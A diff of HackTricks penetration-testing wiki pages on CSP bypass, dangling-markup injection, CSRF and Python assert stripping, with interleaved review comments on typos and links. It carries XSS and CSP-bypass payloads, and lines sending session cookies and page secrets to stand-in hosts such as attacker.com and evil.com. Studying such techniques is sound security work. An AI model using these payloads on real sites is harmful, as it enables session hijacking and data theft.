{% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %} {% content-ref url="../../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
[.pyc.md](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) [.pyc.md](../../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
{% endcontent-ref %} {% endcontent-ref %}
# Misc Python ## Misc Python
## Assert ### Assert
Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\ Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\
Therefore, checks like Therefore, checks like
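Review bot: the context line "will remove asset statements" should read "assert statements" (the subsection is titled Assert and the point is that `-O` strips `assert`), and the bold "**debug**" is almost certainly `__debug__` whose double underscores were swallowed as bold markers; escape them as `\_\_debug\_\_` or put the name in backticks, since `-O` works by setting `__debug__` to false and dropping `if __debug__:` blocks. For the retargeted content-ref, confirm that `.pyc.md` now actually lives under `generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/`; this hunk only rewrites the link.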
@ -884,7 +883,7 @@ def check_permission(super_user):
will be bypassed will be bypassed
# References ## References
* [https://lbarman.ch/blog/pyjail/](https://lbarman.ch/blog/pyjail/) * [https://lbarman.ch/blog/pyjail/](https://lbarman.ch/blog/pyjail/)
* [https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/) * [https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/)
@ -893,7 +892,6 @@ will be bypassed
* [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html) * [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html)
* [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6) * [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6)
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -909,5 +907,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -202,7 +202,7 @@ Then, decompress all the DLsL using [**xamarin-decompress**](https://github.com/
python3 xamarin-decompress.py -o /path/to/decompressed/apk python3 xamarin-decompress.py -o /path/to/decompressed/apk
``` ```
and finally you can use [**these recommended tools**](../../reversing/reversing-tools-basic-methods/#net-decompiler) to **read C# code** from the DLLs. and finally you can use [**these recommended tools**](../../group-1/reversing-tools-basic-methods/#net-decompiler) to **read C# code** from the DLLs.
### Automated Static Code Analysis ### Automated Static Code Analysis
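Review bot: the new link target `../../group-1/reversing-tools-basic-methods/#net-decompiler` replaces the descriptive `reversing/` directory with `group-1`, which reads like a GitBook auto-generated placeholder rather than an intended permanent location; confirm the directory name is final before merging, because the `#net-decompiler` anchor and any external bookmarks keyed on the old `reversing/` path will otherwise break on the next rename.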

View file

@ -1,4 +1,4 @@
# Content Security Policy (CSP) Bypass
<details> <details>
@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## What is CSP
# What is CSP
Content Security Policy or CSP is a built-in browser technology which **helps protect from attacks such as cross-site scripting (XSS)**. It lists and describes paths and sources, from which the browser can safely load resources. The resources may include images, frames, javascript and more. Here is an example of allowing resource from the local domain (self) to be loaded and executed in-line and allow string code executing functions like `eval`, `setTimeout` or `setInterval:` Content Security Policy or CSP is a built-in browser technology which **helps protect from attacks such as cross-site scripting (XSS)**. It lists and describes paths and sources, from which the browser can safely load resources. The resources may include images, frames, javascript and more. Here is an example of allowing resource from the local domain (self) to be loaded and executed in-line and allow string code executing functions like `eval`, `setTimeout` or `setInterval:`
@ -35,12 +34,12 @@ Implemented via meta tag:
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
``` ```
## Headers ### Headers
* `Content-Security-Policy` * `Content-Security-Policy`
* `Content-Security-Policy-Report-Only`This one won't block anything, only send reports (use in Pre environment). * `Content-Security-Policy-Report-Only`This one won't block anything, only send reports (use in Pre environment).
# Defining resources ## Defining resources
CSP works by restricting the origins that active and passive content can be loaded from. It can additionally restrict certain aspects of active content such as the execution of inline javascript, and the use of `eval()`. CSP works by restricting the origins that active and passive content can be loaded from. It can additionally restrict certain aspects of active content such as the execution of inline javascript, and the use of `eval()`.
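Review bot: the context line "`Content-Security-Policy-Report-Only`This one won't block anything" runs the header name straight into the sentence; suggest "`Content-Security-Policy-Report-Only`: this one won't block anything, only send reports (use in a pre-production environment)". The `### Headers` demotion matches the other subsections in this file.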
@ -56,7 +55,7 @@ media-src https://videos.cdn.mozilla.net;
object-src 'none'; object-src 'none';
``` ```
## Directives ### Directives
* **script-src**: This directive specifies allowed sources for JavaScript. This includes not only URLs loaded directly into elements, but also things like inline script event handlers (onclick) and XSLT stylesheets which can trigger script execution. * **script-src**: This directive specifies allowed sources for JavaScript. This includes not only URLs loaded directly into elements, but also things like inline script event handlers (onclick) and XSLT stylesheets which can trigger script execution.
* **default-src**: This directive defines the policy for fetching resources by default. When fetch directives are absent in CSP header the browser follows this directive by default. * **default-src**: This directive defines the policy for fetching resources by default. When fetch directives are absent in CSP header the browser follows this directive by default.
@ -75,7 +74,7 @@ object-src 'none';
* **upgrade-insecure-requests**: This directive instructs browsers to rewrite URL schemes, changing HTTP to HTTPS. This directive can be useful for websites with large numbers of old URL's that need to be rewritten. * **upgrade-insecure-requests**: This directive instructs browsers to rewrite URL schemes, changing HTTP to HTTPS. This directive can be useful for websites with large numbers of old URL's that need to be rewritten.
* **sandbox**: sandbox directive enables a sandbox for the requested resource similar to the sandbox attribute. It applies restrictions to a page's actions including preventing popups, preventing the execution of plugins and scripts, and enforcing a same-origin policy. * **sandbox**: sandbox directive enables a sandbox for the requested resource similar to the sandbox attribute. It applies restrictions to a page's actions including preventing popups, preventing the execution of plugins and scripts, and enforcing a same-origin policy.
## **Sources** ### **Sources**
* \*: This allows any URL except `data:` , `blob:` , `filesystem:` schemes * \*: This allows any URL except `data:` , `blob:` , `filesystem:` schemes
* **self**: This source defines that loading of resources on the page is allowed from the same domain. * **self**: This source defines that loading of resources on the page is allowed from the same domain.
@ -87,9 +86,9 @@ object-src 'none';
* **nonce**: A whitelist for specific inline scripts using a cryptographic nonce (number used once). The server must generate a unique nonce value each time it transmits a policy. * **nonce**: A whitelist for specific inline scripts using a cryptographic nonce (number used once). The server must generate a unique nonce value each time it transmits a policy.
* **sha256-\<hash>**: Whitelist scripts with an specific sha256 hash * **sha256-\<hash>**: Whitelist scripts with an specific sha256 hash
# Unsafe Scenarios ## Unsafe Scenarios
## 'unsafe-inline' ### 'unsafe-inline'
```yaml ```yaml
Content-Security-Policy: script-src https://google.com 'unsafe-inline'; Content-Security-Policy: script-src https://google.com 'unsafe-inline';
@ -97,13 +96,13 @@ Content-Security-Policy: script-src https://google.com 'unsafe-inline';
Working payload: `"/><script>alert(1);</script>` Working payload: `"/><script>alert(1);</script>`
### self + 'unsafe-inline' via Iframes #### self + 'unsafe-inline' via Iframes
{% content-ref url="csp-bypass-self-+-unsafe-inline-with-iframes.md" %} {% content-ref url="csp-bypass-self-+-unsafe-inline-with-iframes.md" %}
[csp-bypass-self-+-unsafe-inline-with-iframes.md](csp-bypass-self-+-unsafe-inline-with-iframes.md) [csp-bypass-self-+-unsafe-inline-with-iframes.md](csp-bypass-self-+-unsafe-inline-with-iframes.md)
{% endcontent-ref %} {% endcontent-ref %}
## 'unsafe-eval' ### 'unsafe-eval'
```yaml ```yaml
Content-Security-Policy: script-src https://google.com 'unsafe-eval'; Content-Security-Policy: script-src https://google.com 'unsafe-eval';
@ -111,7 +110,7 @@ Content-Security-Policy: script-src https://google.com 'unsafe-eval';
Working payload: `<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>` Working payload: `<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>`
## Wildcard ### Wildcard
```yaml ```yaml
Content-Security-Policy: script-src 'self' https://google.com https: data *; Content-Security-Policy: script-src 'self' https://google.com https: data *;
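Review bot: in the example policy `script-src 'self' https://google.com https: data *;` the `data` token is missing its colon; a bare `data` is parsed as a host-source (a host literally named "data"), not as the `data:` scheme-source, and `*` does not cover `data:` (the Sources list above says so). The `<script src=data:text/javascript,...>` payload shown for this scenario therefore only applies to a policy spelled `data:`, which is also what an auditor should look for. Suggest `script-src 'self' https://google.com https: data: *;`.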
@ -124,7 +123,7 @@ Working payload:
"/>'><script src=data:text/javascript,alert(1337)></script> "/>'><script src=data:text/javascript,alert(1337)></script>
``` ```
## Lack of object-src and default-src ### Lack of object-src and default-src
```yaml ```yaml
Content-Security-Policy: script-src 'self' ; Content-Security-Policy: script-src 'self' ;
@ -138,7 +137,7 @@ Working payloads:
<param name="AllowScriptAccess" value="always"></object> <param name="AllowScriptAccess" value="always"></object>
``` ```
## File Upload + 'self' ### File Upload + 'self'
```yaml ```yaml
Content-Security-Policy: script-src 'self'; object-src 'none' ; Content-Security-Policy: script-src 'self'; object-src 'none' ;
@ -158,7 +157,7 @@ Moreover, even if you could upload a **JS code inside** a file using a extension
From here, if you find a XSS and a file upload, and you manage to find a **misinterpreted extension**, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot ([some polyglot examples here](https://github.com/Polydet/polyglot-database)). From here, if you find a XSS and a file upload, and you manage to find a **misinterpreted extension**, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot ([some polyglot examples here](https://github.com/Polydet/polyglot-database)).
## Third Party Endpoints + 'unsafe-eval' ### Third Party Endpoints + 'unsafe-eval'
```yaml ```yaml
Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval'; Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
@ -171,7 +170,7 @@ Load a vulnerable version of angular and execute arbitrary JS:
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div> <div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
``` ```
### Other payloads: #### Other payloads:
```markup ```markup
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
@ -187,7 +186,7 @@ Load a vulnerable version of angular and execute arbitrary JS:
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)> <div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>
``` ```
## Third Party Endpoints + JSONP ### Third Party Endpoints + JSONP
```http ```http
Content-Security-Policy: script-src 'self' https://www.google.com; object-src 'none'; Content-Security-Policy: script-src 'self' https://www.google.com; object-src 'none';
@ -204,22 +203,22 @@ Scenarios like this where `script-src` is set to `self` and a particular domain
The same vulnerability will occur if the **trusted endpoint contains an Open Redirect**, because if the initial endpoint is trusted, redirects are trusted. The same vulnerability will occur if the **trusted endpoint contains an Open Redirect**, because if the initial endpoint is trusted, redirects are trusted.
## Folder path bypass ### Folder path bypass
If CSP policy points to a folder and you use **%2f** to encode **"/"**, it is still considered to be inside the folder. All browsers seem to agree on that.\ If CSP policy points to a folder and you use **%2f** to encode **"/"**, it is still considered to be inside the folder. All browsers seem to agree on that.\
This leads to a possible bypass, by using "**%2f..%2f**" if server decodes it. For example, if CSP allows `http://example.com/company/` you can bypass the folder restriction and execute: `http://example.com/company%2f..%2fattacker/file.js` This leads to a possible bypass, by using "**%2f..%2f**" if server decodes it. For example, if CSP allows `http://example.com/company/` you can bypass the folder restriction and execute: `http://example.com/company%2f..%2fattacker/file.js`
Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output) Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
## Iframes JS execution ### Iframes JS execution
{% content-ref url="../xss-cross-site-scripting/iframes-in-xss-and-csp.md" %} {% content-ref url="../xss-cross-site-scripting/iframes-in-xss-and-csp.md" %}
[iframes-in-xss-and-csp.md](../xss-cross-site-scripting/iframes-in-xss-and-csp.md) [iframes-in-xss-and-csp.md](../xss-cross-site-scripting/iframes-in-xss-and-csp.md)
{% endcontent-ref %} {% endcontent-ref %}
## missing **base-uri** ### missing **base-uri**
If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection.md). If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection/).
Moreover, if the **page is loading a script using a relative path** (like `/js/app.js`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\ Moreover, if the **page is loading a script using a relative path** (like `/js/app.js`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\
If the vulnerable page is loaded with **httpS**, make use a httpS url in the base. If the vulnerable page is loaded with **httpS**, make use a httpS url in the base.
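Review bot: retargeting `../dangling-markup-html-scriptless-injection.md` to `../dangling-markup-html-scriptless-injection/` matches that page becoming a directory README (the CSRF page in this commit gets the same change); two context-line fixes while here: "Online Example:[ ](...)" contains an empty-text link that renders as a stray clickable space, collapse it into the single link that follows, and "make use a httpS url in the base" should read "make sure to use an https URL in the base".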
@ -228,7 +227,7 @@ If the vulnerable page is loaded with **httpS**, make use a httpS url in the bas
<base href="https://www.attacker.com/"> <base href="https://www.attacker.com/">
``` ```
## AngularJS events ### AngularJS events
Depending on the specific policy, the CSP will block JavaScript events. However, AngularJS defines its own events that can be used instead. When inside an event, AngularJS defines a special `$event` object, which simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome, there is a special property on the `$event/event` object called `path`. This property contains an array of objects that causes the event to be executed. The last property is always the `window` object, which we can use to perform a sandbox escape. By passing this array to the `orderBy` filter, we can enumerate the array and use the last element (the `window` object) to execute a global function, such as `alert()`. The following code demonstrates this: Depending on the specific policy, the CSP will block JavaScript events. However, AngularJS defines its own events that can be used instead. When inside an event, AngularJS defines a special `$event` object, which simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome, there is a special property on the `$event/event` object called `path`. This property contains an array of objects that causes the event to be executed. The last property is always the `window` object, which we can use to perform a sandbox escape. By passing this array to the `orderBy` filter, we can enumerate the array and use the last element (the `window` object) to execute a global function, such as `alert()`. The following code demonstrates this:
@ -239,7 +238,7 @@ Depending on the specific policy, the CSP will block JavaScript events. However,
**Find other Angular bypasses in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) **Find other Angular bypasses in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
## AngularJS and whitelisted domain ### AngularJS and whitelisted domain
``` ```
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url; Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
@ -254,11 +253,11 @@ Working payloads:
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script> ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
``` ```
## Bypass CSP with dangling markup ### Bypass CSP with dangling markup
Read [how here](../dangling-markup-html-scriptless-injection.md). Read [how here](../dangling-markup-html-scriptless-injection/).
## 'unsafe-inline'; img-src \*; via XSS ### 'unsafe-inline'; img-src \*; via XSS
``` ```
default-src 'self' 'unsafe-inline'; img-src *; default-src 'self' 'unsafe-inline'; img-src *;
@ -276,7 +275,7 @@ From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](
You could also abuse this configuration to **load javascript code inserted inside an image**. If for example, the page allows to load images from twitter. You could **craft** an **special image**, **upload** it to twitter and abuse the "**unsafe-inline**" to **execute**a JS code (as a regular XSS) that will **load** the **image**, **extract** the **JS** from it and **execute** **it**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/) You could also abuse this configuration to **load javascript code inserted inside an image**. If for example, the page allows to load images from twitter. You could **craft** an **special image**, **upload** it to twitter and abuse the "**unsafe-inline**" to **execute**a JS code (as a regular XSS) that will **load** the **image**, **extract** the **JS** from it and **execute** **it**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
## img-src \*; via XSS (iframe) - Time attack ### img-src \*; via XSS (iframe) - Time attack
Notice the lack of the directive `'unsafe-inline'`\ Notice the lack of the directive `'unsafe-inline'`\
This time you can make the victim **load** a page in **your control** via **XSS** with a `<iframe`. This time you are going to make the victim access the page from where you want to extract information (**CSRF**). You cannot access the content of the page, but if somehow you can **control the time the page needs to load** you can extract the information you need. This time you can make the victim **load** a page in **your control** via **XSS** with a `<iframe`. This time you are going to make the victim access the page from where you want to extract information (**CSRF**). You cannot access the content of the page, but if somehow you can **control the time the page needs to load** you can extract the information you need.
@ -342,13 +341,13 @@ run();
</script> </script>
``` ```
## [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/) ### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/)
```javascript ```javascript
document.querySelector('DIV').innerHTML="<iframe src='javascript:var s = document.createElement(\"script\");s.src = \"https://pastebin.com/raw/dw5cWGK6\";document.body.appendChild(s);'></iframe>"; document.querySelector('DIV').innerHTML="<iframe src='javascript:var s = document.createElement(\"script\");s.src = \"https://pastebin.com/raw/dw5cWGK6\";document.body.appendChild(s);'></iframe>";
``` ```
## Leaking Information CSP + Iframe ### Leaking Information CSP + Iframe
Imagine a situation where a **page is redirecting** to a different **page with a secret depending** on the **user**. For example the user **admin** accessing **redirectme.domain1.com** is redirected to: **adminsecret321.domain2.com** and you can cause a XSS to the admin.\ Imagine a situation where a **page is redirecting** to a different **page with a secret depending** on the **user**. For example the user **admin** accessing **redirectme.domain1.com** is redirected to: **adminsecret321.domain2.com** and you can cause a XSS to the admin.\
**Also the page redirected isn't allowed by the security policy, but the page that redirects is.** **Also the page redirected isn't allowed by the security policy, but the page that redirects is.**
@ -368,11 +367,11 @@ img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev http
Trick from [**here**](https://ctftime.org/writeup/29310). Trick from [**here**](https://ctftime.org/writeup/29310).
# CSP Exfiltration Bypasses ## CSP Exfiltration Bypasses
If there is a strict CSP that doesn't allow you to **interact with external servers**, there some things you can always do to exfiltrate the information. If there is a strict CSP that doesn't allow you to **interact with external servers**, there some things you can always do to exfiltrate the information.
## Location ### Location
You could just update the location to send to the attackers server the secret information: You could just update the location to send to the attackers server the secret information:
@ -381,7 +380,7 @@ var sessionid = document.cookie.split('=')[1]+".";
document.location = "https://attacker.com/?" + sessionid; document.location = "https://attacker.com/?" + sessionid;
``` ```
## Meta tag ### Meta tag
You could redirect injecting a meta tag (this is just a redirect, this won't leak content) You could redirect injecting a meta tag (this is just a redirect, this won't leak content)
@ -389,7 +388,7 @@ You could redirect injecting a meta tag (this is just a redirect, this won't lea
<meta http-equiv="refresh" content="1; http://attacker.com"> <meta http-equiv="refresh" content="1; http://attacker.com">
``` ```
## DNS Prefetch ### DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for a later usage.\ To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for a later usage.\
You can indicate a browser to pre-resolve a hostname with: `<link reol="dns-prefetch" href="something.com">` You can indicate a browser to pre-resolve a hostname with: `<link reol="dns-prefetch" href="something.com">`
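Review bot: the context line `<link reol="dns-prefetch" href="something.com">` has a typo in the attribute name; browsers ignore an unknown `reol` attribute, so as written the element triggers no prefetch at all. Suggest `<link rel="dns-prefetch" href="something.com">`, which is also the form the `X-DNS-Prefetch-Control: off` mitigation mentioned below is meant to neutralize.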
@ -421,7 +420,7 @@ X-DNS-Prefetch-Control: off
Apparently this technique doesn't work in headless browsers (bots) Apparently this technique doesn't work in headless browsers (bots)
{% endhint %} {% endhint %}
## WebRTC ### WebRTC
In several pages you can read that **WebRTC doesn't check the `connect-src` policy** of the CSP. In several pages you can read that **WebRTC doesn't check the `connect-src` policy** of the CSP.
@ -432,13 +431,13 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp));
However, it doesn't look like it's [not possible anymore](https://github.com/w3c/webrtc-nv-use-cases/issues/35) (or at least not that easy). However, it doesn't look like it's [not possible anymore](https://github.com/w3c/webrtc-nv-use-cases/issues/35) (or at least not that easy).
If you know how to exfiltrate info with WebRTC [**send a pull request please!**](https://github.com/carlospolop/hacktricks)**** If you know how to exfiltrate info with WebRTC [**send a pull request please!**](https://github.com/carlospolop/hacktricks)\*\*\*\*
# Policy Injection ## Policy Injection
**Research:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection) **Research:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)
## Chrome ### Chrome
If a **parameter** sent by you is being **pasted inside** the **declaration** of the **policy,** then you could **alter** the **policy** in some way that makes **it useless**. You could **allow script 'unsafe-inline'** with any of these bypasses: If a **parameter** sent by you is being **pasted inside** the **declaration** of the **policy,** then you could **alter** the **policy** in some way that makes **it useless**. You could **allow script 'unsafe-inline'** with any of these bypasses:
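Review bot: the `****` at the end of the "send a pull request please!" line is a leftover artifact, and escaping it to `\*\*\*\*` will now render four literal asterisks; delete it instead. In the same hunk, "it doesn't look like it's not possible anymore" is a double negative; the linked issue is cited as evidence that the trick no longer works (or is no longer easy), so "it looks like it's not possible anymore" is the intended sentence.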
@ -450,21 +449,21 @@ script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
Because this directive will **overwrite existing script-src directives**.\ Because this directive will **overwrite existing script-src directives**.\
You can find an example here: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E) You can find an example here: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
## Edge ### Edge
In Edge is much simpler. If you can add in the CSP just this: **`;_`** **Edge** would **drop** the entire **policy**.\ In Edge is much simpler. If you can add in the CSP just this: **`;_`** **Edge** would **drop** the entire **policy**.\
Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert\(1\)%3C/script%3E) Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert\(1\)%3C/script%3E)
# Checking CSP Policies Online ## Checking CSP Policies Online
* [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com) * [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)
* [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/) * [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/)
# Automatically creating CSP ## Automatically creating CSP
[https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy) [https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy)
# References ## References
{% embed url="https://hackdefense.com/blog/csp-the-how-and-why-of-a-content-security-policy/" %} {% embed url="https://hackdefense.com/blog/csp-the-how-and-why-of-a-content-security-policy/" %}
@ -474,7 +473,6 @@ Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y
{% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme" %} {% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme" %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -490,5 +488,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -183,7 +183,7 @@ To set the domain name of the server in the URL that the Referrer is going to se
### **Exfiltrating CSRF Token** ### **Exfiltrating CSRF Token**
If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) vulnerability. If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection/) vulnerability.
### **GET using HTML tags** ### **GET using HTML tags**
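Review bot: the Dangling Markup link on the touched line now points at the directory `dangling-markup-html-scriptless-injection/` instead of the `.md` file, which only resolves if `dangling-markup-html-scriptless-injection/README.md` lands in this same commit (the move itself is in another of the 89 files); check that the SUMMARY entry for the page was changed to the directory form too, otherwise the sidebar keeps a dead link while this page is fixed.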

View file

@ -1,4 +1,4 @@
# Dangling Markup - HTML scriptless injection
<details> <details>
@ -16,17 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## Resume
# Resume This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](../xss-cross-site-scripting/)but you can **inject some HTML tags**.\
This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**.\
It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution. It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
Several techniques commented here can be used to bypass some [**Content Security Policy**](content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...). Several techniques commented here can be used to bypass some [**Content Security Policy**](../content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...).
# Main Applications ## Main Applications
## Stealing clear text secrets ### Stealing clear text secrets
If you inject `<img src='http://evil.com/log.cgi?` when the page is loaded the victim will send you all the code between the injected `img` tag and the next quote inside the code. If a secret is somehow located in that chunk, you will steal i t(you can do the same thing using a double quote,take a look which could be more interesting to use). If you inject `<img src='http://evil.com/log.cgi?` when the page is loaded the victim will send you all the code between the injected `img` tag and the next quote inside the code. If a secret is somehow located in that chunk, you will steal i t(you can do the same thing using a double quote,take a look which could be more interesting to use).
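Review bot: "Resume" on the re-levelled heading means "Summary" here (false friend from "resumen"); and the context line at the end of the hunk still reads "steal i t(you can do the same thing using a double quote,take a look", so fix the spacing while the heading is being touched. The `../` prefixes added to the XSS and CSP links are the correct consequence of this page moving one directory down. On substance, the `<img src='http://evil.com/log.cgi?` trick captures only up to the next single quote, so the secret has to sit between the injection point and the next `'` in the markup, and current Chromium blocks resource requests whose URL contains both a raw newline and a `<` (its dangling-markup mitigation), so this leak fails whenever the captured chunk spans a tag on a later line; both limits belong next to the "double quote" remark.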
@ -60,7 +59,7 @@ You could also insert a `<base` tag. All the information will be sent until the
steal me'<b>test</b> steal me'<b>test</b>
``` ```
## Stealing forms ### Stealing forms
```markup ```markup
<base href='http://evil.com/'> <base href='http://evil.com/'>
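Review bot: the `<base href='http://evil.com/'>` injection only rewrites relative URLs and only when no earlier `<base href>` exists: the HTML parser honours the first `base` element with an `href` and ignores later ones, so the payload has to land before any legitimate one (normally in `<head>`). Forms and scripts with absolute URLs are unaffected; say so next to the `update_profile.php` example.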
